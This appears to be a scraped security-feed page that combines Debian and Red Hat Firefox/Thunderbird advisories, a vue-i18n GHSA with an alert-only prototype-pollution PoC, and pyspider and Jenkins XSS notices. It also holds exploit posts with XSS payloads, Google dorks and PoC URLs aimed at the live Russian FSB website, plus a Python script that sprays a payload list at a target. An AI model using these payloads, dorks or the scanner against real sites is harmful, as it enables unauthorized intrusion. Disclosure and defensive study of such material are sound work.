Debian Linux Security Advisory 5820-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, spoofing or cross-site scripting.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5820-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 27, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-11692 CVE-2024-11694 CVE-2024-11695                 CVE-2024-11696 CVE-2024-11697 CVE-2024-11699Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, spoofing or cross-site scripting. For the stable distribution (bookworm), these problems have been fixed inversion 128.5.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmdHcXoACgkQEMKTtsN8TjbVxg/+NpPN+XZlnNqjVxWv48TJO30h6qh+Zf7SZ3ToyxKH/nvMEOKNsgbutlednaKDlfJbVa761JBSCVR/CyERS32hC+IGDdn9i5w0BS2IrMsPOnF/eU6OExgUr7rMMkPuKUp9+YGJJwfEDgqHWSGj0jr2S2HcyMAtx2vcINSIhzbIcO7xhxj6P4CGAA8/0l2eOq3YpclgYB23gP69arKDPj++AIv5lLpmg1bHr+aeXde9Am/roaEdvA6tK5PM4ay86TsSsMKjB9bQLjcpH8sHYoCt8VRA4qkCED2KAwQBxQ115imOoeRyJbRjWHpbIt9DEBxxsbYlQTldDhghV4YcsrIhEFaVY5zlDHYegEicxrCVoQJV0cHbpedeCp2otNEuM+crLl1l/CuSEeBkX2F1Ng1CM2/dGJpfuYN63mhO7Zs+UIuecqyLy7ZMe7Ucno2sNJnLPIwcx+zpQwLj/jUDzK89jzW4ZR6BQ5VOI2ex+blMsrYFKWuMoZhXpnlt7qC1/SzlseedwbyAeSXLBcLhMckXfshNsO/B6JmgluOb5i2BBLFlUOpSFwZdDoknaKxjXLF+EUhrV08R63pxKp5HZvsBiirQk1kfbhyReaaWjBn1nIOr5x0IASEGk+s4T80/s+5lJpGkqnzjwTK8bM58i7sN5qJIrJD2gAgtsXxyOYj02S4==Cop0-----END PGP SIGNATURE-----

Debian Security Advisory 5820-1

Simple Chat System version 1.0 suffers from a cross site scripting vulnerability.

Change Mirror Download

    #Exploit Title:Simple Chat System 1.0#Reflected XSS#Date:05/12/2024#Exploit Author:Merve Hatice Arslan#Vendor Homepage:https://code-projects.org/simple-chat-system/#Sofware Link:https://download.code-projects.org/details/ec6340ea-ef68-48d9-b9b2-da397f52b2dc#Version:1.0#Tested on:Linux / XAMPP#Scripting (XSS) in user.php via the name and username fields.#Payload:<img src=1 href=1 onerror="javascript:alert(1)"></img>

Simple Chat System 1.0 Cross Site Scripting

The Russian FSB appears to suffer from a cross site scripting vulnerability. The researchers who discovered it have reported it multiple times to them.

/*!  
- # VULNERABILITY: Cross Site Scripting Federal Security Service of the Russian Federation  
- # Authenticated Persistent XSS  
- # GOOGLE DORK: inurl:fsb.ru/fsb/sh.htm?query=  
- # DATE: 2024-11-29  
- # SECURITY RESEARCHER:  E1.Coders  
- # VENDOR: FSB [ http://www.fsb.ru/ ]  
- # SOFTWARE LINK: http://www.fsb.ru/  
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C  
- # CWE: CWE-79  
*/

  ### -- [ Info: ]

 [i] A valid persistent XSS vulnerability was discovered in the search section of the Federal Security Service of the Russian Federation website.

 [i] Vulnerable parameter(s): sh.htm?query=  < AND >  /fsb/sh.htm?query=

  ### -- [ Impact: ]

 [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

  ### -- [ Payloads: ]

 `"'><img src=xxx:x \x22onerror=javascript:alert(1)>

 "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />

 `"'><img src=xxx:x onerror\x09=javascript:alert(1)>

  ### -- [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ]

 http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20onerror\x09=javascript:alert(1)%3E

 http://www.fsb.ru/fsb/sh.htm?query=%22/%3E%3Cimg/onerror=\x20javascript:alert(1)\x20src=xxx:x%20/%3E

 http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20\x22onerror=javascript:alert(1)%3E

  ### -- [ Contacts: ]

 [+] E-Mail: E1.Coders@Mail.Ru

 [+] GitHub: @e1coders

Russian FSB Cross Site Scripting

Laravel version 11.0 suffers from a cross site scripting vulnerability.

    /*!- # VULNERABILITY: Cross Site Scripting Laravel version 11.0 - # Authenticated Persistent XSS- # GOOGLE DORK: inurl:.com/?q=- # GOOGLE DORK: Site:.com/?q=- # DATE: 2024-12-01- # SECURITY RESEARCHER:  E1.Coders- # VENDOR: LARAVEL [https://laravel.com/ ]- # SOFTWARE LINK: https://laravel.com/docs/11.x/installation- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C- # CWE: CWE-79- # download payload https://raw.githubusercontent.com/payloadbox/xss-payload-list/refs/heads/master/Intruder/xss-payload-list.txt*/  ### -- [ Info: ] [i] A valid persistent XSS vulnerability was discovered in of the Laravel version 11.0  website. [i] Vulnerable parameter(s): - inurl:.com/?q=    [AND]    Site:.com/?q=  ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.  ### -- [ EXPLOIT : ]   import requests # Target URLurl = "https://TARGET.com/?q=" # Function to read payloads from a filedef read_payloads(filename="payloads.txt"):    try:        with open(filename, "r") as f:            payloads = [line.strip() for line in f]        return payloads    except FileNotFoundError:        print(f"Error: File '{filename}' not found.")        return [] # Function to perform the requestdef xss_attack(url, payload):    full_url = url + payload    try:        response = requests.get(full_url)        return response.status_code, response.text # return status code and response text    except requests.exceptions.RequestException as e:        print(f"An error occurred during the request: {e}")        return None, None # Main function to iterate over payloads and attackdef main():    payloads = read_payloads()    if not payloads:        return     results = []    for payload in payloads:        status_code, response_text = xss_attack(url, payload)        if status_code:          results.append({"payload": payload, "status_code": status_code, "response": response_text})     #Save results to a file (Example, you might need to adjust based on your desired output)    with open("attack_results.txt", "w") as f:        for result in results:            f.write(f"Payload: {result['payload']}\n")            f.write(f"Status Code: {result['status_code']}\n")            f.write(f"Response: {result['response']}\n\n") if __name__ == "__main__":    main()   ### -- [ Contacts: ] [+] E-Mail: E1.Coders@Mail.Ru [+] GitHub: @e1coders

Laravel 11.0 Cross Site Scripting

Red Hat Security Advisory 2024-10704-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include bypass, cross site scripting, and spoofing vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10704.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:10704-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:10704  
Issue date:         2024-12-02  
Revision:           03  
CVE Names:          CVE-2024-11159  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: Potential disclosure of plaintext in OpenPGP encrypted message (CVE-2024-11159)

* firefox: thunderbird: CSP Bypass and XSS Exposure via Web Compatibility Shims (CVE-2024-11694)

* firefox: thunderbird: Unhandled Exception in Add-on Signature Verification (CVE-2024-11696)

* firefox: thunderbird: Select list elements could be shown over another site (CVE-2024-11692)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 133, Thunderbird 133, Firefox ESR 128.5, and Thunderbird 128.5 (CVE-2024-11699)

* firefox: thunderbird: URL Bar Spoofing via Manipulated Punycode and Whitespace Characters (CVE-2024-11695)

* firefox: thunderbird: Improper Keypress Handling in Executable File Confirmation Dialog (CVE-2024-11697)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-11159

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2325896  
https://bugzilla.redhat.com/show_bug.cgi?id=2328941  
https://bugzilla.redhat.com/show_bug.cgi?id=2328943  
https://bugzilla.redhat.com/show_bug.cgi?id=2328946  
https://bugzilla.redhat.com/show_bug.cgi?id=2328947  
https://bugzilla.redhat.com/show_bug.cgi?id=2328948  
https://bugzilla.redhat.com/show_bug.cgi?id=2328950

Red Hat Security Advisory 2024-10704-03

Red Hat Security Advisory 2024-10702-03 - An update for firefox is now available for Red Hat Enterprise Linux 9. Issues addressed include bypass, cross site scripting, and spoofing vulnerabilities.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10702.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2024:10702-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:10702Issue date:         2024-12-02Revision:           03CVE Names:          CVE-2024-11692====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.Security Fix(es):* firefox: thunderbird: CSP Bypass and XSS Exposure via Web Compatibility Shims (CVE-2024-11694)* firefox: thunderbird: Unhandled Exception in Add-on Signature Verification (CVE-2024-11696)* firefox: thunderbird: Select list elements could be shown over another site (CVE-2024-11692)* firefox: thunderbird: Memory safety bugs fixed in Firefox 133, Thunderbird 133, Firefox ESR 128.5, and Thunderbird 128.5 (CVE-2024-11699)* firefox: thunderbird: URL Bar Spoofing via Manipulated Punycode and Whitespace Characters (CVE-2024-11695)* firefox: thunderbird: Improper Keypress Handling in Executable File Confirmation Dialog (CVE-2024-11697)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-11692References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2328941https://bugzilla.redhat.com/show_bug.cgi?id=2328943https://bugzilla.redhat.com/show_bug.cgi?id=2328946https://bugzilla.redhat.com/show_bug.cgi?id=2328947https://bugzilla.redhat.com/show_bug.cgi?id=2328948https://bugzilla.redhat.com/show_bug.cgi?id=2328950

Red Hat Security Advisory 2024-10702-03

Red Hat Security Advisory 2024-10667-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include bypass, cross site scripting, and spoofing vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10667.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:10667-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:10667  
Issue date:         2024-12-02  
Revision:           03  
CVE Names:          CVE-2024-11159  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: Potential disclosure of plaintext in OpenPGP encrypted message (CVE-2024-11159)

* firefox: thunderbird: CSP Bypass and XSS Exposure via Web Compatibility Shims (CVE-2024-11694)

* firefox: thunderbird: Unhandled Exception in Add-on Signature Verification (CVE-2024-11696)

* firefox: thunderbird: Select list elements could be shown over another site (CVE-2024-11692)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 133, Thunderbird 133, Firefox ESR 128.5, and Thunderbird 128.5 (CVE-2024-11699)

* firefox: thunderbird: URL Bar Spoofing via Manipulated Punycode and Whitespace Characters (CVE-2024-11695)

* firefox: thunderbird: Improper Keypress Handling in Executable File Confirmation Dialog (CVE-2024-11697)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-11159

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2325896  
https://bugzilla.redhat.com/show_bug.cgi?id=2328941  
https://bugzilla.redhat.com/show_bug.cgi?id=2328943  
https://bugzilla.redhat.com/show_bug.cgi?id=2328946  
https://bugzilla.redhat.com/show_bug.cgi?id=2328947  
https://bugzilla.redhat.com/show_bug.cgi?id=2328948  
https://bugzilla.redhat.com/show_bug.cgi?id=2328950

Red Hat Security Advisory 2024-10667-03

### Vulnerability type
XSS

### Description
vue-i18n can be passed locale messages to `createI18n` or `useI18n`.
we can then translate them using `t` and `$t`.
vue-i18n has its own syntax for local messages, and uses a message compiler to generate AST.
In order to maximize the performance of the translation function, vue-i18n uses bundler plugins such as `@intlify/unplugin-vue-i18n` and bulder to convert the AST in advance when building the application.
By using that AST as the locale message, it is no longer necessary to compile, and it is possible to translate using the AST.

The AST generated by the message compiler has special properties for each node in the AST tree to maximize performance. In the PoC example below, it is a `static` property, but that is just one of the optimizations.
About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts

In general, the locale messages of vue-i18n are optimized during production builds using `@intlify/unplugin-vue-i18n`,
so there is always a property that is attached during optimization like this time.
But if you are using a locale message AST in development mode or your own, there is a possibility of XSS if a third party injects.

### Reproduce (PoC)
```html
<!doctype html>
<html>
  <head>
    <meta charset="utf-8" />
    <title>vue-i18n XSS</title>
    <script src="https://unpkg.com/vue@3"></script>
    <script src="https://unpkg.com/vue-i18n@10"></script>
    
    <script>
      /**
       * Prototype pollution vulnerability with `Object.prototype`.
       * The 'static' property is part of the optimized AST generated by the vue-i18n message compiler.
       * About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts
       *
       * In general, the locale messages of vue-i18n are optimized during production builds using `@intlify/unplugin-vue-i18n`,
       * so there is always a property that is attached during optimization like this time.
       * But if you are using a locale message AST in development or your own, there is a possibility of XSS if a third party injects prototype pollution code.
       */
      Object.defineProperty(Object.prototype, 'static', {
        configurable: true,
        get() {
          alert('prototype polluted!')
          return 'prototype pollution'
        }
      })
    </script> 
 </head>
  <body>
    <div id="app">
      <p>{{ t('hello') }}</p>
    </div>
    <script>
      const { createApp } = Vue
      const { createI18n, useI18n } = VueI18n

      // AST style locale message, which build by `@intlify/unplugin-vue-i18n`
      const en = {
        hello: {
          type: 0,
          body: {
            items: [
              {
                type: 3,
                value: 'hello world!'
              }
            ]
          }
        }
      }

      const i18n = createI18n({
        legacy: false,
        locale: 'en',
        messages: {
          en
        }
      })

      const app = createApp({
        setup() {
          const { t } = useI18n()
          return { t }
        }
      })
      app.use(i18n)
      app.mount('#app')
    </script>
  </body>
</html>
```

### Workarounds
Before v10.0.0, we can work around this vulnerability by using the regular compilation (`jit: false` of `@intlify/unplugin-vue-i18n` plugin configuration) way instead of jit compilation.
- jit compilation: https://vue-i18n.intlify.dev/guide/advanced/optimization.html#jit-compilation
- bundler plugin option: https://github.com/intlify/bundle-tools/tree/main/packages/unplugin-vue-i18n#jitcompilation

### References
- [Simillar case: Vue 2 XSS vulnerability with prototype pollution](https://www.herodevs.com/vulnerability-directory/cve-2024-6783)

**Vulnerability type**

XSS

**Description**

vue-i18n can be passed locale messages to createI18n or useI18n.  
we can then translate them using t and $t.  
vue-i18n has its own syntax for local messages, and uses a message compiler to generate AST.  
In order to maximize the performance of the translation function, vue-i18n uses bundler plugins such as @intlify/unplugin-vue-i18n and bulder to convert the AST in advance when building the application.  
By using that AST as the locale message, it is no longer necessary to compile, and it is possible to translate using the AST.

The AST generated by the message compiler has special properties for each node in the AST tree to maximize performance. In the PoC example below, it is a static property, but that is just one of the optimizations.  
About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts

In general, the locale messages of vue-i18n are optimized during production builds using @intlify/unplugin-vue-i18n,  
so there is always a property that is attached during optimization like this time.  
But if you are using a locale message AST in development mode or your own, there is a possibility of XSS if a third party injects.

**Reproduce (PoC)**

<!doctype html\>
<html\>
  <head\>
    <meta charset\="utf-8" />
    <title\>vue-i18n XSS</title\>
    <script src\="https://unpkg.com/vue@3"\></script\>
    <script src\="https://unpkg.com/vue-i18n@10"\></script\>
    
    <script\>
      /\*\*
       \* Prototype pollution vulnerability with \`Object.prototype\`.
       \* The 'static' property is part of the optimized AST generated by the vue-i18n message compiler.
       \* About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts
       \*
       \* In general, the locale messages of vue-i18n are optimized during production builds using \`@intlify/unplugin-vue-i18n\`,
       \* so there is always a property that is attached during optimization like this time.
       \* But if you are using a locale message AST in development or your own, there is a possibility of XSS if a third party injects prototype pollution code.
       \*/
      Object.defineProperty(Object.prototype, 'static', {
        configurable: true,
        get() {
          alert('prototype polluted!')
          return 'prototype pollution'
        }
      })
    </script\> 
 </head\>
  <body\>
    <div id\="app"\>
      <p\>{{ t('hello') }}</p\>
    </div\>
    <script\>
      const { createApp } \= Vue
      const { createI18n, useI18n } \= VueI18n

      // AST style locale message, which build by \`@intlify/unplugin-vue-i18n\`
      const en \= {
        hello: {
          type: 0,
          body: {
            items: \[
              {
                type: 3,
                value: 'hello world!'
              }
            \]
          }
        }
      }

      const i18n \= createI18n({
        legacy: false,
        locale: 'en',
        messages: {
          en
        }
      })

      const app \= createApp({
        setup() {
          const { t } \= useI18n()
          return { t }
        }
      })
      app.use(i18n)
      app.mount('#app')
    </script\>
  </body\>
</html\>

**Workarounds**

Before v10.0.0, we can work around this vulnerability by using the regular compilation (jit: false of @intlify/unplugin-vue-i18n plugin configuration) way instead of jit compilation.

*   jit compilation: https://vue-i18n.intlify.dev/guide/advanced/optimization.html#jit-compilation
*   bundler plugin option: https://github.com/intlify/bundle-tools/tree/main/packages/unplugin-vue-i18n#jitcompilation

**References**

*   Simillar case: Vue 2 XSS vulnerability with prototype pollution

**References**

*   GHSA-9r9m-ffp6-9x4v
*   https://nvd.nist.gov/vuln/detail/CVE-2024-52809
*   intlify/vue-i18n@72f0d32
*   intlify/vue-i18n@9f20909

GHSA-9r9m-ffp6-9x4v: vue-i18n has cross-site scripting vulnerability with prototype pollution

pyspider through 0.3.10 allows /update XSS. NOTE: This vulnerability only affects products that are no longer supported by the maintainer

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-x4x5-jx9j-mmv7: pyspider Cross-site Scripting vulnerability

Jenkins Simple Queue Plugin 1.4.4 and earlier does not escape the view name.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with View/Create permission.

Simple Queue Plugin 1.4.5 escapes the view name.

Tag

#xss